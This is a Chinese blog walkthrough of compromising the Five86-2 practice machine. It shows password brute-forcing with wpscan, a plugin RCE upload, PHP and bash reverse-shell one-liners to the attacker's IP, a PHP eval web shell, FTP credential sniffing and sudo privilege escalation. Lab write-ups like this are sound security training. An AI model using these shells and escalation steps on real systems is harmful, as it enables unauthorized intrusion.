渗透测试学习之靶机Five86-2

最新推荐文章于 2024-02-28 10:00:00 发布
最新推荐文章于 2024-02-28 10:00:00 发布
阅读量604 收藏 2
点赞数 1
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/105028024
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.148
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.148
    在这里插入图片描述
  • web站点相关服务信息
    css加载不出来,奇怪…
    在这里插入图片描述
  • 目录信息
    使用dirb,看一下有无敏感文件:
    dirb http://192.168.246.148
    在这里插入图片描述
    试图访问http://192.168.246.148/wp-admin/,然后出现这个:
    在这里插入图片描述
    设置下hosts文件:在C:\Windows\System32\drivers\etc的hosts文件中增加192.168.246.148 five86-2
    然后再访问看看:
    在这里插入图片描述
    正常了,回到访问http://192.168.246.148,页面也正常显示了:
    在这里插入图片描述
  • 枚举用户
    使用wpscan枚举下用户名:
    wpscan --url http://192.168.246.148 -e u
    在这里插入图片描述
    然后对这5个user进行爆破,还是使用wpscan:
    wpscan --url http://five86-2 -P /usr/share/wordlists/rockyou.txt -U /root/Desktop/user.txt
    rockyou.txt是个很大的字典,跑完要好久,就不等了,让它跑着,然后先直接用大佬们跑出来的结果链接
    跑到和大佬们一样结果暂停了:
    在这里插入图片描述
    barney spooky1
    stephen apollo1
3. 登录用户,插件漏洞getshell

使用前面的用户密码登录,查看信息:
barney用户下有个active状态的插件,直接搜一下这个名字,有rce的字样:
在这里插入图片描述
在这里插入图片描述
链接
👆看一下内容,版本对应上了,有利用方法:
在这里插入图片描述
将html和php压缩,然后上传:
在这里插入图片描述
在这里插入图片描述
上传:
在这里插入图片描述
点击右上角的publish:
在这里插入图片描述
然后监听138上的8888端口,访问five86-2/wp-content/uploads/articulate_uploads/xiaoLin6/xiaoLin.php
在这里插入图片描述
能够输出前后的1和2,但是8888没接到反弹…
system不能执行吗还是没有nc??…换成php版
$sock=fsockopen("192.168.246.138",8888);exec("/bin/sh -i <&3 >&3 2>&3");
在这里插入图片描述
在这里插入图片描述
访问five86-2/wp-content/uploads/articulate_uploads/xiaoLin7/xiaoLin.php
在这里插入图片描述
一下子断开…
再试一个:
<?php system('bash -i >& /dev/tcp/192.168.246.138/8888 0>&1');?>
在这里插入图片描述
没反应…
还是传个一句话,然后蚁剑连一下吧,顺便把压缩包的名字改一下,或许是这个原因
<?php @eval($_POST['xl']);?>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
一下子进来了…
两个虚拟机cpu太满了,还是弹回shell吧,用大佬姿势,传个php版的弹shell,然后在虚拟终端中执行参考文章
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4. 提权

权限低,切换下用户,使用之前爆破的用户密码试下:
su stephen
apollo1
这个用户进去了,
在这里插入图片描述
获取交互式shell,python不行,python3可以:
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看系统进程:
ps -auxwww
在这里插入图片描述
前面端口信息存在ftp,用户paul在使用,可以获取ftp的明文信息:
使用tcpdump:
tcpdump -D查看可监听的接口,8个…
在这里插入图片描述
监听veth4fa8b8e 21端口,tcpdump -i veth4fa8b8e port 21 -nn -v
在这里插入图片描述
过一会发现PASS,切换用户到paul,我只能退出重回蚁剑去getshell,再切了:
在这里插入图片描述
可以使用peter权限免密执行service,可以获得peter权限:
sudo -u peter service ../../bin/bash
在这里插入图片描述
可以使用root权限执行/usr/bin/passwd,用来修改root的密码,然后登录root:
sudo -u root /usr/bin/passwd root
在这里插入图片描述
切换到root,进入root目录下就可以了:
在这里插入图片描述

总结
wxlblh
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机Five86-1——新手进阶1
m0_75051044的博客
01-24 1323
攻击机:kali靶机Five86-1实验目的:获取flag。
Vulnhub:Five86-2靶机
qq_43884092的博客
03-03 97
tcpdump抓取流量,获得paul用户密码:paul|esomepasswford。使用之前wpscan爆破出的stephen用户的密码切换到stephen用户。创建一个zip压缩包里面包含一个html文件,和php反弹shell。使用linpease.sh收集信息,发现可以使用tcpdump。wpscan收集目标wordpress用户。用命令passwd修改root用户密码。靶机:192.168.111.211。切换到paul用户查看sudo权限。peter用户sudo权限。wpscan爆破用户密码。
Five86-2靶机
最新发布
Yuer422的博客
02-28 1867
所有网络上的数据包,甚至是那些发送给其他主机的,通过这种机制,都是可以捕获的。表示执行用户模块,这将允许WPScan尝试收集有关目标WordPress网站的用户信息,包括用户名称、角色和其他相关信息。结果与sn参数相同,但是sP参数只进行ping扫描,而sn会发送四种不同类型的数据包来探测目标主机是否在线,只要收到其中一个包的回复,那就证明目标机开启。的含义是启用用户(User)模块,用于扫描和收集有关WordPress网站用户的信息。WPScan 可以检测WordPress核心、主题和插件的已知漏洞。
Five86-2靶机渗透记录
Jach1n
01-31 201
Five86-2靶机渗透记录
vulnhub靶场之Five86-2
qq_58091216的博客
01-27 972
ftp是明文传输,进程执行的脚本文件看执行命令应该是个定时任务,尝试抓下包,要确定抓哪个网卡的流量,查看下网卡信息,ifconfig这里用不了,可以用ip add,veth是虚拟网卡,br可能是桥接网卡,veth的master是br,类似冗余链路,这里就抓master网卡,也就是br网卡。点击其他链接的时候,会跳转到一个域名,但是无法访问,一般出现这个情况,应该是要设置本地的hosts文件,加上192.168.52.133 five86-2 即可,kali修改/etc/hosts文件即可。
渗透five86-3
Ays.Ie的博客
03-03 509
本篇文章为five86的第3个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub five86-2
m0_64815693的博客
03-06 2001
vulnhub five86-2
five86-3靶机渗透攻略
weixin_47311099的博客
01-12 1484
下载连接:https://www.five86.com/five86-3.html 信息收集 nmap扫描 nmap -sS -sV 192.168.93.0/24 可知目标ip:192.168.93.133 只开放80 网站信息收集 cms为drupal7 drupal目录穿越漏洞利用 使用msf发现失败,利用方式不同与DC1 搜索cms漏洞利用方式 https://www.exploit-db.com EXP为:http://example.com/sites/all/modules/avat
Vulnhub靶机Five86-2渗透笔记
liver100day的博客
09-11 502
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 目录爆破3.漏洞利用3.1 查找有关WordPress 5.1.4版本的漏洞3.2 WPscan 破解账户密码3.3 反弹shell第一步:生成一句话木马文件第二步:压缩一句话木马文件第三步:上传压缩文件并获取shell4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机Five86-2 IP地址未知 靶机下载地址:http://www.
渗透five86-2
Ays.Ie的博客
03-03 505
本篇文章为five86的第2个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶机渗透-Vulnhub-Five86-2
dahege666的博客
04-28 328
下载地址: 1、 链接:https://pan.baidu.com/s/1Q33O_3vbnHbPoi4qMbFlog 提取码:h3um 2、http://www.vulnhub.com/entry/five86-2,418/ 靶机five86-2(VMware桥接) IP:192.168.10.90 攻击机:Kali(VMware桥接) IP:192.168..10.81 1、使用nmap扫描目标系统,查看操作系统指纹...
Five86-3靶机渗透记录
Jach1n
01-31 130
Five86-3靶机渗透记录
five86-2靶机渗透攻略
weixin_47311099的博客
01-11 725
下载地址:https://www.five86.com/five86-2.html 需要修改hosts文件 添加five86-2的解析 ​ 信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 ​ 192.168.93.132开放21ftp 80http ​ 网站信息收集 访问80端口 ​ 发现cms为wordpress5.1.4,未发现有效利用漏洞 使用wpscan进行扫描 wpscan --url [http://five86-2](http://five86-2)
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值